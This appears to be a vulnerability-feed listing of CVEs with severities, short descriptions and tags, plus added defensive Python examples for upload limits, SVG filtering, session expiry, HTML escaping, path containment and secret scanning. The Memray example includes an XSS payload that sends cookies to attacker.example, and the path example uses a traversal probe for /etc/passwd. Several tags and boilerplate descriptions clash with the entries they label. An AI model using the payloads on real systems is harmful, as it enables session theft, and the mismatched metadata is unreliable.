Raytha CMS contains a Stored Cross-Site Scripting (XSS) vulnerability in the post editing functionality, specifically within the FieldValues[1].Value parameter that fails to sanitize user input before storage and rendering. An authenticated attacker with post editing permissions can inject malicious HTML and JavaScript code that persists in the database and executes in the browsers of any user viewing the affected post, potentially leading to session hijacking, credential theft, or defacement. The vulnerability affects versions prior to 1.4.6 and does not appear to be actively exploited in the wild based on available intelligence, though the low CVSS score of 5.1 reflects the requirement for prior authentication and user interaction rather than the severity of the potential impact.
XSS
Raytha
-
CVE-2025-69196
MEDIUM
CVSS 6.5
A remote code execution vulnerability (CVSS 6.5). Remediation should follow standard vulnerability management procedures.
Authentication Bypass
Python
Redhat
-
CVE-2025-68971
MEDIUM
CVSS 6.5
In Forgejo through 13.0.3, the attachment component allows a denial of service by uploading a multi-gigabyte file attachment (e.g., to be associated with an issue or a release).
Denial Of Service
Redhat
Suse
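The denial of service above comes down to the server accepting a request body of unbounded size. The following is an added example in Python, not Forgejo's own code, of the control an attachment handler needs: a cap enforced on the bytes actually read, not only on the declared Content-Length, so an oversized or length-less body is rejected before it is buffered or persisted. The cap value, the handler and the endless stream used as input are constructed for the demo.

```python
import io

# Added example (not Forgejo code): enforce an attachment size cap while streaming.
MAX_ATTACHMENT_BYTES = 4 * 1024 * 1024  # hypothetical 4 MiB cap for the demo


class AttachmentTooLarge(Exception):
    """Raised as soon as the stream exceeds the configured cap."""


def store_attachment(stream, sink, max_bytes=MAX_ATTACHMENT_BYTES, chunk_size=64 * 1024):
    """Copy `stream` into `sink`, aborting once more than `max_bytes` has been read.

    The cap is checked per chunk, before the chunk is written, so a client that
    lies about Content-Length (or omits it) cannot make the server buffer or
    persist a multi-gigabyte body. Returns the number of bytes written.
    """
    total = 0
    while True:
        chunk = stream.read(chunk_size)
        if not chunk:
            return total
        total += len(chunk)
        if total > max_bytes:
            raise AttachmentTooLarge(f"attachment exceeds {max_bytes} bytes")
        sink.write(chunk)


def handle_upload(declared_length, stream, sink, max_bytes=MAX_ATTACHMENT_BYTES):
    """Reject on the declared length first (cheap), then enforce on the actual bytes.

    Returns an (http_status, message) pair; 413 is Payload Too Large.
    """
    if declared_length is not None and declared_length > max_bytes:
        return 413, "declared Content-Length exceeds limit"
    try:
        written = store_attachment(stream, sink, max_bytes)
    except AttachmentTooLarge as exc:
        return 413, str(exc)
    return 201, f"stored {written} bytes"


class EndlessStream:
    """Constructed input: a body that never ends, standing in for a multi-GiB upload."""

    def read(self, size=-1):
        return b"A" * (size if size > 0 else 65536)


if __name__ == "__main__":
    print(handle_upload(10, io.BytesIO(b"0123456789"), io.BytesIO(), max_bytes=16))
    print(handle_upload(None, EndlessStream(), io.BytesIO(), max_bytes=1024))
```

The declared-length check alone is not enough: chunked transfer encoding carries no Content-Length, and a hostile client can send a small header with a huge body. The per-chunk check is what actually bounds memory and disk use.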
-
CVE-2025-65734
MEDIUM
CVSS 5.4
An authenticated arbitrary file upload vulnerability in the Courses/Work Assignments module of gunet Open eClass v3.11, and fixed in v3.13, allows attackers to execute arbitrary code via uploading a crafted SVG file.
RCE
XSS
File Upload
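An SVG is XML that browsers will execute script from if it reaches them inline, so an upload filter that only checks the extension or MIME type does nothing against the entry above. The following is an added example in Python, not Open eClass code, of a check that rejects the known script-bearing constructs: script and foreignObject elements, SMIL animation elements, on* event attributes, javascript:/data: hrefs (after stripping the whitespace and control characters browsers tolerate inside a scheme), style values with external references, and DOCTYPE/ENTITY declarations. The element and attribute lists and the sample documents are assumptions constructed for the demo.

```python
import re
import xml.etree.ElementTree as ET

# Added example, not Open eClass's own code: accept an uploaded SVG only if it
# is inert. Everything rejected here is a known script-execution vector in SVG.
DANGEROUS_TAGS = {"script", "foreignobject", "iframe", "embed", "object",
                  "set", "animate", "animatetransform"}
URL_ATTRS = {"href", "src"}  # xlink:href reduces to the local name "href"
# Browsers tolerate "java\tscript:" and "  javascript:", so strip that noise
# before looking at the scheme.
_SCHEME_NOISE = re.compile(r"[\x00-\x20]")
_STYLE_EXTERNAL = re.compile(r"url\s*\(|expression\s*\(|@import", re.I)


def _local(name):
    """'{http://www.w3.org/2000/svg}script' -> 'script' (namespace dropped)."""
    return name.rsplit("}", 1)[-1].lower()


def _is_active_url(value):
    scheme = _SCHEME_NOISE.sub("", value).lower().split(":", 1)[0]
    return scheme in {"javascript", "data", "vbscript"}


def svg_violations(svg_bytes):
    """Return the reasons the SVG is unsafe; an empty list means it passed."""
    text = svg_bytes.decode("utf-8", errors="replace")
    if re.search(r"<!(doctype|entity)", text, re.I):
        # Do not even hand entity declarations to the parser.
        return ["DOCTYPE/ENTITY declarations are not allowed"]
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    problems = []
    if _local(root.tag) != "svg":
        problems.append(f"root element is <{_local(root.tag)}>, not <svg>")
    for el in root.iter():
        tag = _local(el.tag)
        if tag in DANGEROUS_TAGS:
            problems.append(f"forbidden element <{tag}>")
        for attr, value in el.attrib.items():
            a = _local(attr)
            if a.startswith("on"):
                problems.append(f"event handler attribute {a} on <{tag}>")
            elif a in URL_ATTRS and _is_active_url(value):
                problems.append(f"active URL in {a} on <{tag}>: {value[:40]!r}")
            elif a == "style" and _STYLE_EXTERNAL.search(value):
                problems.append(f"style with external reference on <{tag}>")
    return problems


def is_safe_svg(svg_bytes):
    return not svg_violations(svg_bytes)


# Constructed samples for the demo.
SAFE_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><circle r="4"/></svg>'
TAB_SCHEME_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" '
                  b'xmlns:xlink="http://www.w3.org/1999/xlink">'
                  b'<a xlink:href="java&#9;script:alert(1)"><text>x</text></a></svg>')

if __name__ == "__main__":
    print(svg_violations(SAFE_SVG))
    print(svg_violations(TAB_SCHEME_SVG))
```

This is a gate, not a sanitizer: a file that fails is rejected rather than rewritten. Even a passing file should not be served from the application's origin as an inline document; serving user SVGs with Content-Disposition: attachment, or only ever referencing them from an img element, removes the script execution context regardless of what the filter missed.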
-
CVE-2025-57543
MEDIUM
CVSS 6.1
Cross-site scripting (XSS) vulnerability in NetBox 4.3.5 in the "comment" field on object forms.
XSS
-
CVE-2025-52648
MEDIUM
CVSS 4.8
A security vulnerability in HCL AION (CVSS 4.8). Remediation should follow standard vulnerability management procedures.
Information Disclosure
Jwt Attack
-
CVE-2025-52644
MEDIUM
CVSS 5.8
HCL AION contains inadequate auditing and logging mechanisms that fail to properly track certain user actions, reducing the traceability of user activities and potentially compromising monitoring, accountability, and incident investigation capabilities. The vulnerability affects AION 2.0 and is classified as an Information Disclosure issue with a CVSS score of 5.8. An attacker with local access and low privileges could exploit this to perform actions without adequate logging, hindering forensic analysis and compliance audit trails.
Information Disclosure
Aion
-
CVE-2025-52643
MEDIUM
CVSS 4.7
A security vulnerability in HCL AION (CVSS 4.7). Remediation should follow standard vulnerability management procedures.
Information Disclosure
Aion
-
CVE-2025-52638
MEDIUM
CVSS 5.6
HCL AION contains a container base image authentication vulnerability where container images are not properly verified before deployment, potentially allowing attackers to execute untrusted or malicious container images within the AION environment. This affects AION 2.0 and could enable attackers with local access and high privileges to compromise system integrity and availability. No public evidence of active exploitation or POC availability has been identified in the provided intelligence sources.
Information Disclosure
-
CVE-2025-52637
MEDIUM
CVSS 4.5
HCL AION contains a SQL injection or improper query validation vulnerability that allows authenticated local users with low privileges to execute potentially harmful SQL queries against the database. The vulnerability affects certain offering configurations and could lead to limited information disclosure, data modification, or denial of service under specific conditions. With a CVSS score of 4.5 and local attack vector requirement, this represents a moderate-risk vulnerability primarily exploitable by insider threats or compromised local accounts.
Information Disclosure
SQLi
-
CVE-2025-52458
MEDIUM
CVSS 5.5
An out-of-bounds write vulnerability (CWE-787) exists in OpenHarmony versions up to and including v5.1.0, enabling local attackers to execute arbitrary code within pre-installed applications. The vulnerability requires local access and low privileges but can result in complete confidentiality compromise. This is a memory corruption issue that, while restricted to specific scenarios, poses a meaningful risk to OpenHarmony device security given the local attack vector and high impact on confidentiality.
RCE
Buffer Overflow
Memory Corruption
Openharmony
-
CVE-2025-41432
MEDIUM
CVSS 5.5
An out-of-bounds write vulnerability (CWE-787) in OpenHarmony v5.1.0 and earlier versions allows local attackers with limited privileges to achieve arbitrary code execution within pre-installed applications through memory corruption. The vulnerability is tracked as CVE-2025-41432 with a CVSS score of 5.5 and is limited to restricted attack scenarios that require local access and low privilege levels. It is not currently listed in CISA's Known Exploited Vulnerabilities (KEV) catalog, but public disclosure documentation exists and memory corruption bugs of this kind are attractive to motivated threat actors.
RCE
Buffer Overflow
Memory Corruption
Openharmony
-
CVE-2025-25277
MEDIUM
CVSS 6.3
This vulnerability allows arbitrary code execution in OpenHarmony pre-installed applications through improper handling of incompatible types, enabling local attackers to escalate privileges and execute arbitrary code within the context of trusted system applications. Affected versions include OpenHarmony v5.0.3 through v5.1.0.x, impacting the core application framework across the OpenHarmony ecosystem. While the CVSS score of 6.3 reflects moderate severity, the vulnerability requires local access and high attack complexity, limiting real-world exploitability to restricted scenarios as noted by the vendor.
RCE
Memory Corruption
Openharmony
-
CVE-2025-15554
MEDIUM
CVSS 6.0
LAPSWebUI before version 2.4 by Truesec improperly caches LAPS (Local Administrator Password Solution) passwords in browser storage, allowing a local attacker with user-level access to retrieve plaintext or weakly protected admin credentials from the browser cache. An attacker who gains access to a workstation where an administrator has used LAPSWebUI can escalate privileges to local administrator by exploiting this caching behavior. While the CVSS score is moderate at 6.0, the practical impact is high because successful exploitation directly enables privilege escalation to administrative access.
Privilege Escalation
-
CVE-2025-15553
MEDIUM
CVSS 6.0
LAPSWebUI before version 2.4 contains a non-functional logout mechanism that allows an authenticated local attacker to obtain elevated privileges through disclosure of cached local administrator passwords. An attacker with existing workstation access and low privileges can exploit this flaw to escalate to local admin by recovering credentials that should have been cleared upon session termination. The vulnerability carries a CVSS v4.0 score of 6.0 (Medium) with local attack vector and requires prior login plus user interaction, though the confidentiality impact on sensitive credentials is marked as high.
Privilege Escalation
Lapswebui
-
CVE-2025-15552
MEDIUM
CVSS 6.0
Insufficient Session Expiration in Truesec's LAPSWebUI before version 2.4 allows local attackers with user-level privileges to obtain local administrator passwords through inadequate session management controls. An attacker with physical or logical access to a workstation can exploit this vulnerability to escalate privileges and disclose sensitive credentials, potentially compromising domain administration. This vulnerability represents a practical privilege escalation risk in environments relying on LAPS (Local Administrator Password Solution) for credential management.
Privilege Escalation
Information Disclosure
Lapswebui
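The three LAPSWebUI entries above are one failure from three angles: a password was shown, and nothing afterwards made it go away. The following is an added example in Python, not Truesec's code, of the server-side half of the fix: a logout that really revokes the session token, a session lifetime that expires on its own and is re-checked on every request, and the cache headers a response carrying a password must carry so the browser is told not to retain it. The TTL, the in-memory session store and the password lookup are constructed stand-ins for the demo.

```python
import secrets
import time

# Added example, not Truesec's code: session revocation, expiry and no-store
# headers for a password-disclosing endpoint.
SESSION_TTL = 300  # hypothetical: five minutes of inactivity and the session is gone

SESSIONS = {}  # token -> {"user": str, "expires": float}; constructed in-memory store


def login(user, now=None):
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)
    SESSIONS[token] = {"user": user, "expires": now + SESSION_TTL}
    return token


def current_user(token, now=None):
    """Return the user for a live session, or None. Expiry is enforced on every call."""
    now = time.time() if now is None else now
    s = SESSIONS.get(token)
    if s is None:
        return None
    if now >= s["expires"]:
        SESSIONS.pop(token, None)  # expired sessions are deleted, not merely ignored
        return None
    s["expires"] = now + SESSION_TTL  # sliding expiry on activity
    return s["user"]


def logout(token):
    """A logout that does something: the token is unusable afterwards.

    Returns True if a session was actually revoked.
    """
    return SESSIONS.pop(token, None) is not None


def lookup_password(computer):
    # Constructed stand-in for the directory lookup; not a real LAPS query.
    return "P@ssw0rd-for-" + computer


def password_response(token, computer, now=None):
    """Serve a LAPS password only to a live session, with headers that forbid caching.

    Returns (status, headers, body).
    """
    user = current_user(token, now)
    if user is None:
        return 401, {"Cache-Control": "no-store"}, ""
    headers = {
        "Cache-Control": "no-store, max-age=0",  # no-store: never written to any cache
        "Pragma": "no-cache",                    # for HTTP/1.0 intermediaries
        "Expires": "0",
    }
    return 200, headers, f"{computer}: {lookup_password(computer)}"


if __name__ == "__main__":
    t = login("helpdesk")
    print(password_response(t, "WS01"))
    print(logout(t), password_response(t, "WS01")[0])
```

The server cannot reach into localStorage or sessionStorage; if the client-side script copies the password there (the behaviour CVE-2025-15554 describes), no header fixes it. The client must keep the secret only in DOM state that is discarded with the page, and the logout handler should clear whatever it did store before redirecting.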
-
CVE-2025-12736
MEDIUM
CVSS 6.5
OpenHarmony versions 5.0.3 and earlier contain an information disclosure vulnerability caused by use of uninitialized resources, allowing local attackers to leak sensitive data. The vulnerability affects OpenHarmony deployments across all product lines up to v5.0.3.x (per EUVD-2025-208673). An attacker with local access and standard user privileges can read uninitialized memory regions to obtain confidential information without requiring user interaction, though there is no indication of active exploitation in public KEV databases at this time.
Information Disclosure
Openharmony
-
CVE-2025-10461
MEDIUM
CVSS 5.3
An arbitrary file access vulnerability (CVSS 5.3). Remediation should follow standard vulnerability management procedures.
Information Disclosure
Docker
-
CVE-2025-6969
MEDIUM
CVSS 5.0
OpenHarmony versions 5.1.0 and prior contain an improper input validation vulnerability (CWE-20) that allows local attackers with low privileges to trigger a denial of service condition. An authenticated local user can craft malicious input that causes the system to become unresponsive or crash, requiring manual intervention to restore availability. While this vulnerability has a moderate CVSS score of 5.0, the local-only attack vector and requirement for user interaction limit widespread exploitation risk.
Information Disclosure
Openharmony
-
CVE-2025-2274
MEDIUM
CVSS 4.8
Improper Neutralization of Input During Web Page Generation in Forcepoint Web Security (On-Prem) on Windows allows Stored XSS. This issue affects Web Security through 8.5.6.
XSS
Windows
-
CVE-2017-20221
MEDIUM
CVSS 4.3
A cross-site request forgery (CSRF) vulnerability exists in Telesquare SKT LTE Router SDT-CS3B1 version 1.2.0 that allows an attacker to execute arbitrary system commands through the browser session of an authenticated administrator, with no additional validation by the router. An attacker can craft a malicious webpage that, when visited by a logged-in router administrator, triggers unauthorized administrative actions with full router privileges. While the CVSS score of 4.3 is moderate and no active exploitation has been widely reported, command execution on a network infrastructure device is a meaningful risk to affected deployments.
CSRF
Sdt Cs3b1
-
CVE-2026-32778
LOW
CVSS 2.9
libexpat before version 2.7.5 contains a NULL pointer dereference vulnerability in the setContext function that occurs when the library retries operations following an out-of-memory condition. This flaw affects all users of vulnerable libexpat versions and can result in application crashes leading to denial of service. While the CVSS score of 2.9 is low and exploitation requires specific local conditions and high complexity, this vulnerability represents a stability risk for XML parsing operations in memory-constrained or stressed environments.
Denial Of Service
Null Pointer Dereference
-
CVE-2026-32722
LOW
CVSS 3.6
Prior to Memray 1.19.2, Memray rendered the command line of the tracked process directly into generated HTML reports without escaping.
Python
XSS
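The bug class is ordinary: untrusted text (here the tracked process's argv, which anyone who can start the process controls) concatenated into an HTML document. As an added example in Python, not Memray's own code, the unescaped pattern and the fix with html.escape, plus a crude check that tells them apart. The template, the argv and the detector are constructed for the demo.

```python
import html
import re

# Added example, not Memray's code: report rendering with and without escaping.
TEMPLATE = "<html><body><h1>Report</h1><p>Command: {command}</p></body></html>"


def render_unescaped(command_line):
    """Vulnerable pattern: attacker-controlled argv lands in the HTML verbatim."""
    return TEMPLATE.format(command=command_line)


def render_escaped(command_line):
    """Fixed pattern: escape before interpolating into an HTML text node.

    quote=True also escapes quotes, so the same function is safe to reuse for
    attribute values.
    """
    return TEMPLATE.format(command=html.escape(command_line, quote=True))


def contains_markup(report):
    """Crude detector: any tag other than the template's own means injection happened."""
    allowed = {"html", "body", "h1", "p"}
    found = {m.group(1).lower() for m in re.finditer(r"</?([a-zA-Z][a-zA-Z0-9]*)", report)}
    return bool(found - allowed)


# Constructed argv: what a process could be started with to poison a report
# that someone else later opens.
EVIL_ARGV = ('python app.py --name "<script>fetch(\'https://attacker.example/\''
             '+document.cookie)</script>"')

if __name__ == "__main__":
    print(render_unescaped(EVIL_ARGV))
    print(render_escaped(EVIL_ARGV))
```

Escaping at the point of interpolation is the right place for the fix; scrubbing argv at capture time would lose information from the report and still leave every other untrusted field unprotected.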
-
CVE-2026-32638
LOW
CVSS 2.7
CVE-2026-32638 is a security vulnerability (CVSS 2.7). Remediation should follow standard vulnerability management procedures. Vendor patch is available.
Authentication Bypass
-
CVE-2026-32266
LOW
Unauthenticated users can view a list of buckets the plugin has access to.
CSRF
Information Disclosure
-
CVE-2026-29522
None
ZwickRoell Test Data Management versions prior to 3.0.8 contain a local file inclusion (LFI) vulnerability in the /server/node_upgrade_srv.js endpoint.
Path Traversal
Information Disclosure
-
CVE-2026-26230
LOW
CVSS 3.8
Mattermost versions 10.11.x <= 10.11.10 fail to properly validate permission requirements in the team member roles API endpoint, which allows team administrators to demote members to the guest role.
Authentication Bypass
-
CVE-2026-22545
LOW
CVSS 3.1
CVE-2026-22545 is a security vulnerability (CVSS 3.1) exploitable by an authenticated attacker. Remediation should follow standard vulnerability management procedures.
Authentication Bypass
-
CVE-2026-20992
LOW
CVSS 3.3
An improper authorization vulnerability in Samsung Settings allows a local attacker with low privileges to disable configuration of background data usage for applications prior to the SMR Mar-2026 Release 1 patch. The impact is limited: only the integrity of data usage settings is affected, with no data exfiltration or system compromise, and the local attack vector and user-level privilege requirement reduce real-world exploitation likelihood compared to remote or privilege-escalation vulnerabilities.
Authentication Bypass
-
CVE-2026-20989
LOW
CVSS 2.4
This vulnerability involves improper cryptographic signature verification in the Font Settings component of Samsung devices prior to the March 2026 Security Update Release 1. A physical attacker can bypass signature validation to install custom fonts, potentially compromising the integrity of system font resources. The attack requires physical access and user interaction, which limits real-world exploitation frequency.
Information Disclosure
Jwt Attack
-
CVE-2026-4251
LOW
CVSS 2.5
A remote code execution vulnerability in CityData CityChat (CVSS 2.5). Risk factors: public PoC available.
Information Disclosure
Google
Android
-
CVE-2026-4250
LOW
CVSS 2.5
A remote code execution vulnerability in Albert Sağlık Hizmetleri ve Ticaret Albert Health (CVSS 2.5). Risk factors: public PoC available.
Google
Information Disclosure
Android
-
CVE-2026-4243
LOW
CVSS 2.5
A weakness has been identified in La Nacion App 10.2.25 on Android.
Java
Authentication Bypass
Google
Android
-
CVE-2026-4242
LOW
CVSS 2.5
A security vulnerability (CVSS 2.5). Risk factors: public PoC available.
Google
Information Disclosure
Java
Android
-
CVE-2026-4239
LOW
CVSS 3.5
A vulnerability was found in Lagom WHMCS Template up to 2.3.7.
Code Injection
Information Disclosure
-
CVE-2026-4225
LOW
CVSS 2.4
A cross-site scripting (XSS) vulnerability exists in CMS Made Simple versions up to 2.2.21 affecting the User Management Module's admin/listusers.php file. An attacker with high-level privileges can inject malicious JavaScript through the Message parameter to compromise other users' sessions or steal sensitive data. Public exploit code is available and the vulnerability has been actively exploited, making this a tangible threat despite its low CVSS score of 2.4.
PHP
XSS
-
CVE-2026-4222
LOW
CVSS 3.8
A path traversal vulnerability exists in SSCMS versions up to 7.4.0 within the PathUtils.RemoveParentPath function of the plugin download API endpoint (/api/admin/plugins/install/actions/download). An authenticated administrator with high privileges can manipulate the path argument to traverse the file system and access or modify files outside the intended directory, potentially leading to information disclosure or system compromise. The vulnerability has public proof-of-concept code available, though the CVSS score of 3.8 is relatively low due to the requirement for authenticated administrative access, making this a lower-priority but still exploitable issue in environments where admin credentials may be compromised.
Path Traversal
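The entry names a helper whose job is to strip parent-directory segments. As an added example in Python, not SSCMS's code, the following shows why stripping is the wrong primitive: a single-pass removal of "../" can be fed input that becomes a traversal only after the filter runs, while a resolve-then-check on the normalised path needs no guessing about encodings. The remove_parent_path_naive function is an assumed stand-in for that style of filter, not SSCMS's implementation, and the root directory is hypothetical.

```python
import posixpath

# Added example, not SSCMS code: sanitise-then-trust versus resolve-then-check.
PLUGIN_ROOT = "/srv/app/plugins"  # hypothetical plugin download directory


def remove_parent_path_naive(path):
    """Assumed stand-in for a single-pass '../' stripper (not SSCMS's code)."""
    return path.replace("../", "")


def vulnerable_target(user_path):
    """Strip once, join, trust. The stripping itself manufactures the traversal."""
    return posixpath.normpath(posixpath.join(PLUGIN_ROOT, remove_parent_path_naive(user_path)))


def resolve_under_root(root, user_path):
    """Return the absolute target if it stays inside root, else None.

    Absolute paths, NUL bytes and backslashes are refused outright. The rest is
    joined, normalised and checked with commonpath, which handles './', doubled
    slashes and any number of '..' segments, and is not fooled by a sibling
    directory whose name merely starts with the root (e.g. /srv/app/plugins2).
    posixpath is used so the check behaves identically on every OS.
    """
    if "\x00" in user_path or "\\" in user_path or user_path.startswith("/"):
        return None
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, user_path))
    if posixpath.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    probe = "....//....//....//etc/passwd"
    print(remove_parent_path_naive(probe))      # the stripper turns it into ../../../etc/passwd
    print(vulnerable_target(probe))              # /etc/passwd
    print(resolve_under_root(PLUGIN_ROOT, probe))  # harmless path under the root
```

When the target is then opened on disk, resolve the real path (os.path.realpath) and repeat the containment check, since a symlink inside the root can point outside it and no string-level check sees that.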
-
CVE-2026-4219
LOW
CVSS 3.3
A hard-coded credentials vulnerability (CWE-798: Use of Hard-Coded Credentials) exists in the INDEX Conferences & Exhibitions Organization YWF BPOF APGCS Android application (versions up to 1.0.2): the ACCESS_KEY and HASH_KEY values in the BuildConfig.java component are embedded in the app, so an attacker with local access to the device can extract them. The vulnerability requires local execution on the device and affects confidentiality only, but the existence of a published exploit and vendor non-responsiveness raise the practical risk despite the low CVSS score of 3.3.
Google
Authentication Bypass
Java
Android
-
CVE-2026-4218
LOW
CVSS 2.5
A local information disclosure vulnerability exists in myAEDES App versions up to 1.18.4 on Android, stemming from improper handling of the AUTH_KEY argument in the EngageBayUtils.java component. An authenticated local attacker with high complexity can manipulate this parameter to disclose sensitive information, though the attack requires local device access and significant technical effort. A public proof-of-concept exploit is now available, and the vendor has not responded to early disclosure attempts.
Information Disclosure
Java
Google
Android
-
CVE-2026-4217
LOW
CVSS 2.5
A key management error exists in the XREAL Nebula App (Android) up to version 3.2.1, specifically in the CloudStoragePlugin.java component where accessKey, secretAccessKey, and securityToken arguments are improperly handled. An attacker with local access and moderate privileges can manipulate these credentials to bypass authentication controls, resulting in unauthorized information disclosure. A proof-of-concept has been publicly disclosed, though the vulnerability requires high complexity to exploit and the vendor has not responded to early notification.
Java
Google
Information Disclosure
Android
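The three Android entries above (CVE-2026-4219, CVE-2026-4218, CVE-2026-4217) share a root cause: credential material compiled into the app as string constants, where anyone with the package can read it. As an added example, not the vendors' code, the following Python is the kind of check a build pipeline can run over generated or decompiled Java to catch that before release: it flags static final String fields whose names look like keys or secrets and whose values are not empty or an obvious placeholder. The field regex, the name heuristics and the sample BuildConfig are constructed for the demo; the values in it are made up.

```python
import re

# Added example, not the vendors' code: flag credential-looking string constants
# in Java source, the pattern behind BuildConfig.java / EngageBayUtils.java /
# CloudStoragePlugin.java in the entries above.
FIELD_RE = re.compile(
    r'(?:public\s+)?static\s+final\s+String\s+(?P<name>\w+)\s*=\s*"(?P<value>[^"]*)"\s*;'
)
SUSPECT_NAME = re.compile(r"(key|secret|token|password|passwd|auth)", re.I)
# A key-like name is fine when the value is empty or clearly a build-time placeholder.
PLACEHOLDER = re.compile(r"^(|changeme|todo|xxx+|your_?\w+|\$\{[^}]+\}|<[^>]+>)$", re.I)


def find_hardcoded_secrets(java_source):
    """Return (field_name, value) pairs that look like embedded credentials."""
    hits = []
    for m in FIELD_RE.finditer(java_source):
        name, value = m.group("name"), m.group("value")
        if SUSPECT_NAME.search(name) and not PLACEHOLDER.match(value.strip()):
            hits.append((name, value))
    return hits


# Constructed sample resembling a generated BuildConfig; every value is invented.
SAMPLE_BUILDCONFIG = """
public final class BuildConfig {
  public static final boolean DEBUG = false;
  public static final String APPLICATION_ID = "com.example.app";
  public static final String ACCESS_KEY = "ak_live_example_0000000000";
  public static final String HASH_KEY = "4f6d2c9b1e8a7d3c5b2f9e1a6c4d8b7e";
  public static final String API_BASE = "https://api.example.com/";
  public static final String AUTH_KEY = "";
  public static final String SECRET_KEY = "${SECRET_KEY}";
}
"""

if __name__ == "__main__":
    for name, value in find_hardcoded_secrets(SAMPLE_BUILDCONFIG):
        print(f"hard-coded credential: {name} = {value!r}")
```

A hit is a release blocker, not a warning: once the value ships in an APK, rotating it on the server is the only remedy, and every installed copy keeps working against the old key until then. Secrets an app genuinely needs at runtime should be fetched after user authentication and held in Android's keystore-backed storage, never in BuildConfig.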
-
CVE-2026-0639
LOW
CVSS 3.3
This vulnerability is a memory leak in OpenHarmony v6.0 and prior versions that allows a local, low-privileged attacker to trigger a denial-of-service condition by preventing proper memory release during runtime operations. An authenticated local user without special privileges can exhaust system memory through repeated triggering of the affected code path, causing application or system instability. The low CVSS score of 3.3 reflects the limited scope (local access only, no confidentiality or integrity impact), but the underlying memory management flaw (CWE-401: Missing Release of Memory) is a classic stability threat in systems software.
Information Disclosure
-
CVE-2025-71264
LOW
CVSS 3.7
Mumble before version 1.6.870 contains an out-of-bounds array access vulnerability (CWE-125) that allows remote attackers to crash the client application, resulting in denial of service. The vulnerability requires network access but no authentication or user interaction, affecting all users of vulnerable Mumble client versions. While the CVSS score of 3.7 is relatively low and only impacts availability with no confidentiality or integrity compromise, this vulnerability poses a practical risk to voice communication availability in production deployments.
Buffer Overflow
Denial Of Service
Information Disclosure
-
CVE-2025-54758
None
Rejected reason: ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER.
Information Disclosure
-
CVE-2025-53815
None
Rejected reason: ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER.
Information Disclosure
-
CVE-2025-53517
None
Rejected reason: ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER.
Information Disclosure
-
CVE-2025-52649
LOW
CVSS 1.8
HCL AION is affected by a vulnerability where certain identifiers may be predictable in nature.
Information Disclosure
-
CVE-2025-52646
LOW
CVSS 2.2
HCL AION is affected by a vulnerability where certain offering configurations may permit execution of potentially harmful SQL queries.
Information Disclosure
SQLi
-
CVE-2025-52645
LOW
CVSS 1.9
A security vulnerability in HCL AION (CVSS 1.9). Remediation should follow standard vulnerability management procedures.
Information Disclosure
-
CVE-2025-52642
LOW
CVSS 3.3
HCL AION is affected by a vulnerability where internal filesystem paths may be exposed through application responses or system behaviour.
Information Disclosure
-
CVE-2025-52636
LOW
CVSS 1.8
A remote code execution vulnerability in HCL AION (CVSS 1.8). Remediation should follow standard vulnerability management procedures.
Denial Of Service
-
CVE-2025-26474
LOW
CVSS 3.3
OpenHarmony v5.0.3 and prior versions contain an improper input validation vulnerability (CWE-20) that allows a local attacker with limited privileges to read sensitive information from the system. The vulnerability carries a CVSS score of 3.3 with low attack complexity and requires local access and low privileges, so exploitation is confined to restricted scenarios. The available data gives no indication of active exploitation or widespread POC availability, but the information disclosure impact warrants attention in environments where it could feed a local privilege escalation chain.
Information Disclosure